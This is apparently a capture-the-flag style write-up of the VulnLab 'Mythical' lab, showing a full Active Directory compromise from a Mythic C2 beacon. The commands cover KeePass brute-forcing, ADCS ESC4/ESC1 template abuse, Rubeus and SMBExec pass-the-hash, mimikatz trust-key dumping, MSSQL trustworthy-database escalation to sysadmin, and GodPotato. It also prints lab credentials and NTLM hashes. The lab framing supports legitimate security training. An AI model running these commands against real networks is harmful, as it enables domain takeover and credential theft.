Post

VulnLab Mythical

VulnLab Mythical

VulnLab Mythical

Mythical

The following chain is assumed breach scenario

Description:

1
Mythical got ransomwared last year - now they are more careful on where to store their backups and have also "fixed" the vulnerabilities that the attackers used last time. In this assumed breach scenario, your job is to find if it's still possible to compromise the environment.

We have 3 IPs, where second machine hosts Mythic C2

We can make beacon interactive. Usually not a good idea when dealing with memory scan.

1
sleep 0 0

To list available commands type help

1
2
3
4
5
6
7
8
9
10
11
12
Loaded Commands In Agent:

assembly_inject
	Usage: assembly_inject [pid] [assembly] [args]
	Description: Inject the unmanaged assembly loader into a remote process. The loader will then execute the .NET binary in the context of the injected process.
<SNIP>
help
	Usage: help [command]
	Description: The 'help' command gives detailed information about specific commands or general information about all available commands.
clear
	Usage: clear { | all | task Num}
	Description: The 'clear' command will mark tasks as 'cleared' so that they can't be picked up by agents

MYTHICAL-US

Firstly, we should perform some enumeration on the host. We are running in the context of a user MYTHICAL-US\Momo.Ayase

We see some interesting groups

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
USER INFORMATION
----------------

User Name              SID                                          
====================== =============================================
mythical-us\momo.ayase S-1-5-21-614429729-4048209472-3755682007-1129


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                                     
========================================== ================ ============================================= ===============================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group             
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                                       
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group             
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group             
MYTHICAL-US\Backup Admins                  Group            S-1-5-21-614429729-4048209472-3755682007-1131 Mandatory group, Enabled by default, Enabled group             
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group             
MYTHICAL-US\OpenVPN Administrators         Alias            S-1-5-21-614429729-4048209472-3755682007-1130 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                                  


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

To learn more about the network we can perform port scan. We have to register (register_assembly) the file to be able to run with inline_assembly/execute_assembly

Let’s also check arp to know which IPs to scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Interface: 192.168.25.2 --- 0xa
  Internet Address      Physical Address      Type
  192.168.25.1          00-ff-5d-3b-65-7a     dynamic   
  192.168.25.255        ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.251           01-00-5e-00-00-fb     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    

Interface: 10.10.149.53 --- 0xe
  Internet Address      Physical Address      Type
  10.10.149.49          0a-ec-9d-ce-e4-b7     dynamic   
  10.10.149.54          0a-b5-6f-bc-1a-5d     dynamic   
  10.10.149.55          0a-f5-93-5c-61-c9     dynamic   
  10.10.149.63          ff-ff-ff-ff-ff-ff     static    
  169.254.169.250       0a-ec-9d-ce-e4-b7     dynamic   
  169.254.169.254       0a-ec-9d-ce-e4-b7     dynamic   
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.251           01-00-5e-00-00-fb     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    

Now we can perform port scan on IP 192.168.25.1 based on output above. We can also continue scanning other 2 IPs that we received when we spawned the chain

1
inline_assembly -Assembly PortScanner.exe -Arguments hosts=192.168.25.1 ports=21,22,23,25,53,80,88,110,111,135,139,143,443,445,873,993,995,1433,1723,3306,3389,5432,5985,5900,8080

We see ssh, rsync and http ports are open

Interestingly, the third machines seem to be another Domain Controller with MSSQL running (first IP is the DC01).

Let’s enumerate the domain by registering Sharphound and running it. Repeat the steps by

Let’s download it and check the domain info. Looks like the second DC we saw belongs to mythical-eu

We can also check ADCS, since DC01 is a member of Cert Publishers, meaning there should be ADCS installed. Seems like there’s a vulnerable Machine template, which can be exploited by Domain Computers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.0.0                               

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mythical-us,DC=vl'

[*] Listing info about the Enterprise CA 'mythical-us-DC01-CA'

    Enterprise CA Name            : mythical-us-DC01-CA
    DNS Hostname                  : dc01.mythical-us.vl
    FullName                      : dc01.mythical-us.vl\mythical-us-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mythical-us-DC01-CA, DC=mythical-us, DC=vl
    Cert Thumbprint               : E5BD6F5410334B7AEF33FCC1E346789DBE47DE0D
    Cert Serial                   : 5BAD1342312AEE964BFC0FE29B33DB45
    Cert Start Date               : 11/25/2024 9:18:39 AM
    Cert End Date                 : 11/25/2524 9:28:38 AM
    Cert Chain                    : CN=mythical-us-DC01-CA,DC=mythical-us,DC=vl
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
      Allow  ManageCA, ManageCertificates               MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc01.mythical-us.vl\mythical-us-DC01-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
      Object Control Permissions
        Owner                       : MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
        WriteOwner Principals       : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
        WriteDacl Principals        : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
        WriteProperty Principals    : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519



Certify completed in 00:00:15.1575782

We see that MachineAccountQuota is 0 for the current user, so we can’t create a computer object and abuse it right now

One thing, we forgot to check is the rsync port. There’s _admin folder in C drive that contains a directory containing rsync binary, which is probably used for backup based on description we saw. Let’s use the binary. We find our first flag in mythical directory and keepass database

If we try to keepass2john, we receive error

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/bin/bash

# Ensure correct number of arguments
if [[ "$#" -ne 2 ]]; then
    echo "Usage: $0 <password_file> <keepass_file>"
    exit 1
fi

# Arguments
PASSWORD_FILE="$1"
KEEPASS_FILE="$2"

# Check if necessary files exist
if [[ ! -f "$PASSWORD_FILE" ]]; then
    echo "Password file not found: $PASSWORD_FILE"
    exit 1
fi

if [[ ! -f "$KEEPASS_FILE" ]]; then
    echo "KeePass database not found: $KEEPASS_FILE"
    exit 1
fi

# Function to test a single password
check_password() {
    PASSWORD="$1"
    if echo "$PASSWORD" | keepassxc-cli ls "$KEEPASS_FILE" > /dev/null 2>&1; then
        echo "Password successful: $PASSWORD"
        exit 0
    fi
}

export -f check_password
export KEEPASS_FILE

# Process passwords in parallel
cat "$PASSWORD_FILE" | parallel -j$(nproc) check_password {}

echo "No valid password found."
exit 1

After few minutes we get the password and open the file, which contains the creds for domjon user within the domain

1
2
└─$ ./keepass_brute.sh /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt it.kdbx
Password successful: 741852
1
2
3
4
└─$ keepassxc-cli export it.kdbx --format csv
Enter password to unlock it.kdbx: 
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"Root","domjoin","domjoin","hKvhexY5BtAgtWAY","","","","0","2024-11-29T15:49:14Z","2024-11-29T15:49:01Z"

Now, we can create a new token with make_token command to impersonate domjoin user

In case we want to revert back to previous token, we can use rev2self

Strangely, this user also had quota set to 0. Let’s try adding computer anyway, since the name implies that it can join computers (There’s also another way to define quota which is via Domain Controllers GPO). And it works

Now, we can abuse vulnerable template we saw earlier. But we need to impersonate the computer we created

Since now we have write privileges over template, it is vulnerable to ESC4. By abusing the following privileges we can make the template vulnerable to ESC1

In order to modify template, we need to import Sharpview (register_assembly)/Powerview (powershell_import). We don’t need to:

  • Disable Manager Approval Requirement
  • Disable Authorized Signature Requirement
  • Edit Certificate Application Policy Extension to add Client Authentication

The only setting we have to set are:

  • Enable SAN Specification
    • Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-name-flag'=1} -Verbose

Now we can request the certificate. We also have to add enrollment rights to Domain Users by running the following command

1
Add-DomainObjectAcl -TargetIdentity "Machine" -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl" -Verbose

Let’s request the certificate

1
Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:Administrator@mythical-us.vl

Copy the content of the certificate and convert it to pfx (empty passwords)

1
2
3
4
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

Then we upload it to machine and register Rubeus to get a ticket and NTLM

Let’s request the ticket

1
Rubeus.exe asktgt /user:Administrator /certificate:c:\temp\cert.pfx /ptt /nowrap /getcredentials

Now we can spawn another beacon using Invoke-SmbExec or SharpSmbExec

1
Invoke-SMBExec -Target 127.0.0.1 -Domain mythical-us.vl -Username Administrator -Hash C583EF48C5ED66C727AECB6FAB87AC12 -Command c:\programdata\google\update.exe

MYTHICAL-EU

We know that the trust is outbound, we can enumerate mythical-eu domain by using the trust account: mimikatz "lsadump::trust /patch"

To enumerate the domain we can request the ticket. We can either use ticket_cache_add where we specify ticket and luid (to find luid run ticket_cache_list) or simply run the following command in system beacon

1
Rubeus.exe asktgt /user:mythical-us$ /domain:mythical-eu.vl /rc4:d9ccb26347cce041096ed62bfbeae5d3 /nowrap /ptt

Now we can start enumerating again. Let’s start with shares. We have dev share which contains getusers.exe binary

Let’s download it and check it

1
2
└─$ file getusers.exe 
getusers.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections

We find creds for svc_ldap user

We also captured domain info using SharpHound and found another user svc_sql, which luckily had the same password as svc_ldap user: osaRXWkDf2y5SGh5

Now we can play with MSSQL we saw during enumeration stage. We can use SQLRecon. We don’t have sysadmin privileges

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:whoami

Another way to escalate our privileges is by using trustworthy database

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:query /c:"SELECT a.name AS 'database', b.name AS 'owner', is_trustworthy_on FROM sys.databases a JOIN sys.server_principals b ON a.owner_sid = b.sid;"

If a database is marked as trustworthy, and we have control of or may execute as a user who belongs to the database-level db_owner role, then it is possible to assign the server-level sysadmin role to arbitrary logins.

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:query /c:"USE msdb; SELECT b.name, c.name FROM msdb.sys.database_role_members a JOIN msdb.sys.database_principals b ON a.role_principal_id = b.principal_id LEFT JOIN msdb.sys.database_principals c ON a.member_principal_id = c.principal_id;"

Since we have the required privileges, let’s abuse them. Let’s create a procedure that will assign svc_sql login the server-level sysadmin role.

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /database:msdb /m:query /c:"CREATE PROCEDURE sp_privesc WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MYTHICAL-EU\svc_sql', 'sysadmin';"

Now execute the procedure

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /database:msdb /m:query /c:"EXECUTE sp_privesc;"

Now we have sysadmin privileges

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:query /c:"SELECT IS_SRVROLEMEMBER('sysadmin');"

Now let’s enable command execution

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:EnableXp
1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:xpcmd /command:"whoami"

Now let’s get the beacon. Easiest way is to share the folder on DC01 and execute it from DC02

Execute the beacon

1
SQLRecon.exe /a:wintoken /h:dc02.mythical-eu.vl /m:xpcmd /command:"\\dc01.mythical-us.vl\temp\update.exe"

We have SeImpersonatePrivilege privileges, so let’s run GodPotato to escalate privileges

1
GodPotato.exe -cmd "cmd /c \\dc01.mythical-us.vl\temp\update.exe"

https://api.vulnlab.com/api/v1/share?id=72fae192-2ef2-46f3-b36e-2a30789ae89a

This post is licensed under CC BY 4.0 by the author.